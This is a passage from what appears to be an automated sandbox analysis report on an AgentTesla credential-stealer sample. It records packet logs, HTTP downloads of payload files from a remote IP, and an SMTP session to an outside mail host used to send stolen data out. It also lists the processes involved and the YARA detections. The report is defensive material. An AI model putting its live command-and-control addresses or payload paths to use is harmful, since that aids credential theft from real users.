                                                                                            Nov 25, 2021 15:00:21.694004059 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.694026947 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.694050074 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.694072008 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.694092989 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.694116116 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.694138050 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.694159985 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.694180965 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.694202900 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.694217920 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.694566011 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.694715977 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.732558966 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.732601881 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.732641935 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.732691050 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.732731104 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.732732058 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.732768059 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.732775927 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.732777119 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.732784033 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.732819080 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.732844114 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.732877970 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.732887983 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.732932091 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.732944965 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.732973099 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.732989073 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733016014 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733031988 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733057022 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733067036 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733099937 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733108997 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733139992 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733155966 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733181000 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733217001 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733220100 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733258009 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733264923 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733273983 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733298063 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733305931 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733336926 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733364105 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733377934 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733396053 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733421087 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733429909 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733458996 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733472109 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733499050 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733536959 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733540058 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733546019 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733578920 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733618975 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733658075 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733660936 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733689070 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733695984 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733699083 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733701944 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733740091 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733778000 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733815908 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733855009 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733892918 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733918905 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733933926 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733958960 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733973980 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.733983994 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733993053 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.733998060 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734003067 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734030962 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734033108 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734040976 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734072924 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734107971 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734111071 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734142065 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734150887 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734191895 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734195948 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734230042 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734252930 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734282970 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734323978 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734363079 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734390020 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734404087 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734426975 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734435081 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734440088 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734441996 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734466076 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734483004 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734504938 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734522104 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734553099 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734560966 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734601021 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734603882 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734639883 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734679937 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.734683990 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734715939 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.734740019 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741028070 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741069078 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741108894 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741148949 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741164923 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741177082 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741183043 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741189003 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741214991 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741229057 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741266966 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741269112 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741311073 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741326094 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741336107 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741352081 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741373062 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741398096 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741416931 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741439104 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741460085 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741478920 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741494894 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741517067 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741539001 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741558075 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741573095 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741596937 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741621971 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741636992 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741652966 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741679907 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741695881 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741719007 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741740942 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741759062 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741770029 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741799116 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741827011 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741836071 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.741859913 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.741885900 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.742119074 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.742182016 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786628962 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786643982 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786668062 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786706924 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786720991 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786748886 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786787033 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786801100 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786824942 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786863089 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786901951 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786911011 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786953926 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786972046 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786993027 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.787031889 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.787041903 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.787071943 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.787110090 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.787122011 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.787149906 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.787189960 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.787201881 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.787220955 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.787271976 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:49.584430933 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:02:08.256266117 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:08.357487917 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.358764887 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:08.517106056 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.520540953 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:08.621891975 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.622282982 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:08.728094101 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.777755976 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:08.823992968 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:08.934140921 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.934175014 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.934195995 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.934210062 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.934348106 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:08.934407949 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:08.937367916 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.978523016 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:09.080740929 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:09.121315956 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:09.391123056 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:09.492496014 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:09.495181084 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:09.597073078 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:09.598547935 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:09.723249912 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:09.724236012 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:09.825455904 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:09.825968027 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:09.954533100 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:09.955056906 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:10.057502031 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:10.058862925 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:10.059082031 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:10.059964895 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:10.060137033 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:10.160187960 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:10.160217047 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:10.161077023 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:10.161097050 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:10.168694973 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:10.215203047 CET49817587192.168.2.5209.205.200.74

                                                                                            UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2021 15:02:07.988897085 CET | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Nov 25, 2021 15:02:08.120956898 CET | 53 | 58530 | 8.8.8.8 | 192.168.2.5

                                                                                            DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 25, 2021 15:02:07.988897085 CET | 192.168.2.5 | 8.8.8.8 | 0x1da | Standard query (0) | odin.mk-host.com | A (IP address) | IN (0x0001)

                                                                                            DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 25, 2021 15:02:08.120956898 CET | 8.8.8.8 | 192.168.2.5 | 0x1da | No error (0) | odin.mk-host.com | | 209.205.200.74 | A (IP address) | IN (0x0001)

                                                                                            HTTP Request Dependency Graph

                                                                                            • 194.85.248.219

                                                                                            HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49722 | 194.85.248.219 | 80 | C:\Users\user\Desktop\W7UbgU8x18.exe

Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 15:00:19.131431103 CET | 253 | OUT | GET /token_ta992i.txt HTTP/1.1
                                                                                            Host: 194.85.248.219
                                                                                            Connection: Keep-Alive
Nov 25, 2021 15:00:19.160027981 CET | 254 | IN | HTTP/1.1 200 OK
                                                                                            Content-Type: text/plain
                                                                                            Last-Modified: Wed, 24 Nov 2021 19:04:41 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            ETag: "55b9ce2266e1d71:0"
                                                                                            Server: Microsoft-IIS/10.0
                                                                                            Date: Thu, 25 Nov 2021 14:00:18 GMT
                                                                                            Content-Length: 442789
Nov 25, 2021 15:00:19.393758059 CET | 713 | OUT | GET /publickey.txt HTTP/1.1
                                                                                            Host: 194.85.248.219
Nov 25, 2021 15:00:19.421961069 CET | 714 | IN | HTTP/1.1 200 OK
                                                                                            Content-Type: text/plain
                                                                                            Last-Modified: Fri, 29 Oct 2021 16:21:13 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            ETag: "cb9899fde0ccd71:0"
                                                                                            Server: Microsoft-IIS/10.0
                                                                                            Date: Thu, 25 Nov 2021 14:00:18 GMT
                                                                                            Content-Length: 116559
Nov 25, 2021 15:00:21.621463060 CET | 969 | OUT | GET /token_ta992i.txt HTTP/1.1
                                                                                            Host: 194.85.248.219
Nov 25, 2021 15:00:21.650618076 CET | 971 | IN | HTTP/1.1 200 OK
                                                                                            Content-Type: text/plain
                                                                                            Last-Modified: Wed, 24 Nov 2021 19:04:41 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            ETag: "55b9ce2266e1d71:0"
                                                                                            Server: Microsoft-IIS/10.0
                                                                                            Date: Thu, 25 Nov 2021 14:00:21 GMT
                                                                                            Content-Length: 442789
Nov 25, 2021 15:00:21.755748034 CET 1446 OUT GET /publickey.txt HTTP/1.1
                                                                                            Host: 194.85.248.219
Nov 25, 2021 15:00:21.783267021 CET 1447 IN HTTP/1.1 200 OK
                                                                                            Content-Type: text/plain
                                                                                            Last-Modified: Fri, 29 Oct 2021 16:21:13 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            ETag: "cb9899fde0ccd71:0"
                                                                                            Server: Microsoft-IIS/10.0
                                                                                            Date: Thu, 25 Nov 2021 14:00:21 GMT
                                                                                            Content-Length: 116559


                                                                                            SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 25, 2021 15:02:08.517106056 CET | 587 | 49817 | 209.205.200.74 | 192.168.2.5 | 220-odin.mk-host.com ESMTP Exim 4.94.2 #2 Thu, 25 Nov 2021 15:02:08 +0100
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Nov 25, 2021 15:02:08.520540953 CET | 49817 | 587 | 192.168.2.5 | 209.205.200.74 | EHLO 179605
Nov 25, 2021 15:02:08.621891975 CET | 587 | 49817 | 209.205.200.74 | 192.168.2.5 | 250-odin.mk-host.com Hello 179605 [84.17.52.63]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPE_CONNECT
250-STARTTLS
250 HELP
Nov 25, 2021 15:02:08.622282982 CET | 49817 | 587 | 192.168.2.5 | 209.205.200.74 | STARTTLS
Nov 25, 2021 15:02:08.728094101 CET | 587 | 49817 | 209.205.200.74 | 192.168.2.5 | 220 TLS go ahead

                                                                                            Code Manipulations

                                                                                            System Behavior

                                                                                            General

Start time: 15:00:16
Start date: 25/11/2021
Path: C:\Users\user\Desktop\W7UbgU8x18.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\W7UbgU8x18.exe"
Imagebase: 0x410000
File size: 24064 bytes
MD5 hash: 01F140FEA9669403791FB89C47138D69
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.264523511.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000000.264523511.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.258695502.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000000.258695502.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

                                                                                            General

Start time: 15:00:17
Start date: 25/11/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                            General

Start time: 15:00:19
Start date: 25/11/2021
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Imagebase: 0xd70000
File size: 45160 bytes
MD5 hash: B490A24A9328FD89155F075FA26C0DEC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.512779528.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.512779528.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.250051529.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.250051529.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, Author: Joe Security
Reputation: moderate

                                                                                            General

Start time: 15:00:21
Start date: 25/11/2021
